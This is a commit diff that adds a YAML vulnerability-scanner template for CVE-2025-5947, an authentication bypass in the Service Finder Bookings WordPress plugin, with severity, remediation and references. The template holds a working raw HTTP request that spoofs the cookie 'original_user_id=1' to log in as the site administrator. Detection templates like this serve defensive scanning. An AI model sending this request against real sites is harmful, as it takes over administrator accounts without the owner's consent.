feat(cves): add CVE-2025-5947 - Service Finder Bookings Auth Bypass

http/cves/2025/CVE-2025-5947.yaml

@@ -0,0 +1,53 @@
+id: CVE-2025-5947
+
+info:
+  name: Service Finder Bookings - Authentication Bypass
+  author: sedat4ras
+  severity: critical
+  description: |
+    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
+  impact: |
+    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
+  remediation: |
+    Update to the latest version beyond 6.0.
+  reference:
+    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
+    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
+    - https://github.com/M4rgs/CVE-2025-5947_Exploit
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-5947
+    cwe-id: CWE-639
+  metadata:
+    max-request: 2
+    vendor: sf-booking
+    product: service-finder-bookings
+    publicwww-query: "/wp-content/plugins/sf-booking/"
+  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: original_user_id=1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 301
+          - 302
+
+      - type: regex
+        part: header
+        regex:
+          - '(?i)Location:.*\/wp-admin\/'
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - location